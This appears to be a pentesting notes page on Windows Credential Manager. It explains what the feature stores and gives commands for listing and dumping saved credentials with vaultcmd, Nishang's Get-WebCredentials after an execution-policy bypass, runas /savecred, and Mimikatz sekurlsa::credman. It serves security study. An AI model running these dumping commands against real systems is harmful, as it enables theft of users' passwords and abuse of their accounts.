Skip to main content

Windows Credential Manager

Credential Manager is a Windows Feature that stores Logon-Sensitive Information for Websites, Applications, and Networks. It contains Login Credentials such as Usernames, Passwords, and Internet Addresses.


  • Web Credentials contain Authentication Details stored in Internet Browsers or other Applications.
  • Windows Credentials contain Windows Authentication Details, such as NTLM or Kerberos.
  • Generic Credentials contain Basic Authentication Details, such as Clear-Text Usernames and Passwords.
  • Certificate-Based Credentials Authenticated Details based on Certifications.

Info

Authentication Details are stored on the User's Folder and are not Shared among Windows User Accounts. However, they are Cached in Memory.


Accessing Credential Manager

Info

In most cases VaultCmd is Not going to show the Stored Passwords.


We can access the Windows Credential Manager through GUI (Control Panel -> User Accounts -> Credential Manager) or the Command Prompt.

We can use the Microsoft Credentials Manager vaultcmd Utility. By default, Windows has two Vaults, one for Web Credentials and the other one for Windows Machine Credentials.

:: List Available Vaults
vaultcmd /list

:: Listing the Credentials in the Vault
vaultcmd /listproperties:"Vault Name"

:: List more Information about the Stored Credential
vaultcmd /listcreds:"Vault Name"

Credential Dumping

If VaultCmd is not able to show us the Password we can rely on other PowerShell Scripts such as Nishang Get-WebCredentials.ps1.

# Sets Execution Policies for Windows Computers
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force

# Import the Powershell Script
Import-Module .\Get-WebCredentials.ps1
Get-WebCredentials


RunAs

An alternative method of taking advantage of stored credentials is by using RunAs. RunAs is a Command-Line Built-In Tool that allows running Windows Applications or Tools under different Users Permissions.

:: List Saved Credentials
cmdkey /list

:: Using Credentials
runas /savecred /user:<UserName> cmd.exe

:: Run Specific Commands [Password Piping is Not Allowed]
runas /user:<UserName> "cmd /c dir C:\"

Mimikatz

Required Privileges: Administrators

Mimikatz can Dump Clear-Text Passwords stored in the Credential Manager from Memory.

privilege::debug

:: Lists Credentials Manager by targeting the Microsoft Local Security Authority Server DLL [lsasrv.dll]
sekurlsa::credman